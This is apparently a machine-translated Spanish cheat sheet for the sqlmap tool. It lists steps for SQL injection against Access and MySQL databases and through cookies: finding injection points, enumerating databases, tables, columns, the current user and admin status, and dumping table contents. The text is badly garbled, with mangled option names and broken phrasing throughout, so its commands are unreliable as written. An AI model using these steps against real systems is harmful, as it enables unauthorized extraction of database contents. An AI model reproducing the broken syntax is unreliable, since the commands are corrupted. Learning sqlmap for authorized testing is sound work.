Guardar sqlmap resultado de la detección a C: \ Users \ los Administrator.sqlmap \ Output (Windows)
Linux: (/ la raíz / .sqlmap / salida)
inyección de acceso
1. detectar la presencia de la inyección en los puntos
de la tabla 2 .-- tablas de detección
3 .-- columnas -t campo "Nombre de tabla" en la tabla que detectó
4 .-- -C dump "Nombre de campo" -T "Nombre de tabla "detección de contenido que el campo de la tabla
de inyección mysql
1 detecta si hay punto de inyección
2 .-- DBS toda la base de datos actual
base de datos -db 3 .-- actual está utilizando actualmente
-user 4 .-- actual detectar el usuario actual
5 detectar la información de versión .-- versión
6 .-- se-dba detectar si el administrador de la base de usuario actual
de acuerdo 7. Acceso después de base de datos de etapa de implantación, -D especificado
inyección de la galleta
1. el punto de inyección --cookie detector "id = 16" - 2 -Nivel
nivel hasta un máximo de tres cinco riesgo
de detección de nivel nivel especificado
nivel 1, para detectar el GTE, el POST
nivel de detección 2 de datos de la galleta
2 .-- cookie "id = 16" - nivel 2 --tables tabla detección
3.- -cookie "id = 16" - nivel 2 --columns -T " se detecta nombre de tabla" nombre de campo que la tabla
4 .-- cookie "id = 16" - nivel 2 --dump -C " ese campo" -T prueba de "nombre de tabla" el contenido de la tabla en el campo
[Yo no garantiza la utilidad de la tecnología, todos los artículos son sólo de referencia, si mal mal, deje por favor un mensaje]